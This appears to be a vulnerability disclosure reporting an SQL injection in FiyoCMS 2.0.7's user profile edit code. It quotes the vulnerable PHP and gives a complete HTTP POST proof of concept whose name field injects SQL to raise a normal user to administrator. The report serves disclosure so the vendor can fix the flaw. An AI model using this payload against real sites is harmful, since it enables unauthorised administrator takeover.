an update SQL injection in FiyoCMS 2.0.7

[xrmht]

Good day.
I found an update type of SQL injection vulnerability in the FiyoCMS 2.0.7.This vulnerability can lead to normal user privileges elevated to administrator privileges.
the vulnerability lies in /apps/app_user/sys_user.php

if(isset($_POST['edit'])){		
	if(!empty($_POST['email']) AND @ereg("^.+@.+\\..+$",$_POST['email'])) 
	{
		$qrq = false;
		$_POST['bio']	= htmlentities($_POST['bio']);
		if(empty($_POST['password']) AND empty($_POST['kpassword'])){
			$qrq=$db->update(FDBPrefix.'user',array(	
			"name"=>"$_POST[name]",
			"email"=>"$_POST[email]",
			"about"=>"$_POST[bio]"),
			"id=$_SESSION[USER_ID]"); 
		}
	

it can be noticed that these two parameters $_POST[name] $_POST[email] were taken directly into the database query.

poc

POST /www/cve/FiyoCMS-1669403ec38e3f100d17786e06bc33c94152fcf3/user/edit HTTP/1.1
Host: 127.0.0.1
Content-Length: 139
Cache-Control: max-age=0
Origin: http://127.0.0.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://127.0.0.1/www/cve/FiyoCMS-1669403ec38e3f100d17786e06bc33c94152fcf3/user/edit
Accept-Language: zh-CN,zh;q=0.8
Cookie: UM_distinctid=15f6d54e23f539-0723e5e4ddab84-5c153e17-100200-15f6d54e240a17; CNZZDATA1260798858=709893868-1509454193-http%253A%252F%252F127.0.0.1%252F%7C1509803835; PHPSESSID=8d82fdb9a681a4b55ed56fcf8df8fe42
Connection: close

password=&kpassword=&name=xm001",`email`="xxxx@gmail.com",`about`="test",level=1 WHERE id=2%23&email=xxxxx%40gmail.com&bio=wers&edit=Simpan

then you can get into Backstage

I hope you can fix it as soon as possible，if there are any questions, please send me the details to my email at xm001test@gmail.com